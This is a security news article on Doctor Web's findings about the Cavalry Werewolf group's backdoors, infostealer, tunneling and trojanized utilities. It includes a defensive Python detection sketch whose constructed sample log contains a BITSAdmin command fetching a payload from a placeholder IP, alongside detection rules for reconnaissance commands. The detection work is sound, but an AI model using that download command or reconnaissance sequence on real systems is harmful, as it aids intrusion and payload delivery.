Cybersecurity experts at Doctor Web have identified a targeted cyberattack directed at a Russian government-owned entity by a hacker group identified as Cavalry Werewolf.
This operation came to light in July 2025, when the organization recognized spam emails originating from its corporate address, prompting an extensive internal inquiry.
Doctor Web’s analysis linked this incident to a phishing campaign that leveraged password-protected archives disguised as legitimate files. Examination of these archives uncovered a previously unrecognized backdoor, designated as BackDoor.ShellNET.1.
According to Doctor Web’s technical report, this backdoor was based on open-source Reverse-Shell-CS code. Upon activation, the malware established a reverse shell connection, granting attackers the ability to execute commands remotely as well as distribute additional tools.
Furthermore, the attackers utilized the built-in Windows BITSAdmin utility to acquire supplementary payloads, including the infostealer Trojan.FileSpyNET.5. This malware gathered documents, spreadsheets, text files, and images from compromised systems before transmitting them to an external server. Additionally, another component, BackDoor.Tunnel.41, established a SOCKS5 tunnel for covert communication and remote control.
During their investigation, Doctor Web’s researchers noted that Cavalry Werewolf relies on a combination of open-source frameworks and custom backdoors, created in languages such as C#, C++, and Golang, to facilitate remote command execution, proxy tunneling, data exfiltration, and persistence through modifications to the Windows registry and scheduled tasks.
A significant number of these implants were managed via Telegram bots, a method increasingly utilized to oversee infected hosts while concealing the attackers’ infrastructure. Doctor Web also discovered trojanized versions of widely-used utilities, including WinRAR, 7-Zip, and Visual Studio Code, which could trigger secondary malware upon execution.
The operators of Cavalry Werewolf collected system and user information using standard Windows commands like whoami, ipconfig /all, and net user. They additionally reviewed local files and network settings to strategize the next stage of their assault. Analysts suspect that the hackers aimed to extract sensitive information and internal network configurations.
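Two behaviours described above are easy to look for in process-creation telemetry: BITSAdmin being driven from a shell to fetch a file, and the whoami / ipconfig /all / net user reconnaissance sequence landing on one host within a few minutes. The following detection sketch is an added example, not code from Doctor Web's report; the pipe-separated log format, host names, paths and URL are all constructed for illustration.

```python
# Added detection example (not from Doctor Web's report). Flags two behaviours the
# article attributes to Cavalry Werewolf in process-creation logs: BITSAdmin used to
# fetch a payload, and a burst of whoami / "ipconfig /all" / "net user" on one host.
# Log format and every sample value below are constructed for illustration.
from collections import defaultdict
from datetime import datetime, timedelta

RECON = {"whoami", "ipconfig /all", "net user"}  # recon commands named in the article
RECON_WINDOW = timedelta(minutes=5)

# Constructed sample lines: "<ISO time>|<host>|<parent image>|<command line>"
SAMPLE_LOG = """\
2025-07-14T09:01:10|WS-17|explorer.exe|C:\\Windows\\System32\\notepad.exe report.txt
2025-07-14T09:02:03|WS-17|cmd.exe|bitsadmin /transfer job1 http://203.0.113.5/u.bin C:\\Users\\Public\\u.bin
2025-07-14T09:02:40|WS-17|cmd.exe|whoami
2025-07-14T09:02:55|WS-17|cmd.exe|ipconfig /all
2025-07-14T09:03:20|WS-17|cmd.exe|net user
2025-07-14T11:30:00|WS-22|cmd.exe|ipconfig /all
2025-07-14T15:45:00|WS-22|cmd.exe|whoami
"""

def parse(log):
    """Turn the constructed log text into (timestamp, host, parent, command) tuples."""
    rows = []
    for line in log.splitlines():
        ts, host, parent, cmd = line.split("|", 3)
        rows.append((datetime.fromisoformat(ts), host, parent, cmd.strip()))
    return rows

def bits_downloads(rows):
    """Events where bitsadmin is asked to /transfer a file; BITS is rarely driven by hand."""
    return [(ts, host, cmd) for ts, host, _, cmd in rows
            if cmd.lower().startswith("bitsadmin") and "/transfer" in cmd.lower()]

def recon_bursts(rows):
    """Hosts running all three recon commands within RECON_WINDOW, in any order."""
    by_host = defaultdict(list)
    for ts, host, _, cmd in rows:
        if cmd.lower() in RECON:
            by_host[host].append((ts, cmd.lower()))
    hits = []
    for host, events in by_host.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {c for t, c in events[i:] if t - start <= RECON_WINDOW}
            if seen == RECON:
                hits.append((host, start))
                break
    return hits

if __name__ == "__main__":
    rows = parse(SAMPLE_LOG)
    for hit in bits_downloads(rows): print("BITS download:", hit)
    for hit in recon_bursts(rows): print("recon burst:", hit)
```

The two checks are deliberately independent: a BITS transfer alone is a weak signal on an admin workstation, while a recon burst preceded by one from the same parent process is the combination worth escalating.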
Who is Cavalry Werewolf?
Cavalry Werewolf first garnered attention during a campaign that spanned from May to August 2025, targeting Russian state entities and major industrial firms within sectors such as energy, mining, and manufacturing. The group employed spear-phishing emails masquerading as communications from Kyrgyz government officials, facilitating malware deployment and unauthorized access.
In previous attacks, Cavalry Werewolf has utilized custom backdoors and proxy tools like “FoalShell” and “StallionRAT” to enable remote execution and data theft capabilities. Analysts have also identified overlaps in tools and infrastructure with other groups, such as Silent Lynx and YoroTrooper, suggesting a potential connection or collaboration among these actors.
Look Before You Leap… or Weep
While the origins of the Cavalry Werewolf group remain ambiguous, Doctor Web’s investigation reveals that they continue to expand their toolkit, innovating and repurposing old code for subsequent attacks.
The presence of trojanized versions of well-known software like WinRAR, 7-Zip, and Visual Studio Code poses a significant risk, especially if the focus shifts from government networks to general consumers. A single reckless download could lead to complete system compromise.
This underlines the importance of not downloading software from third-party websites, however reliable their user reviews may appear. Do not install applications, games, or utilities from unverified sources for the sake of convenience. Always use official platforms and, even then, scan new files with VirusTotal and your antivirus software before installation.
The aim of this information is not to instill fear but rather to foster a culture of security awareness.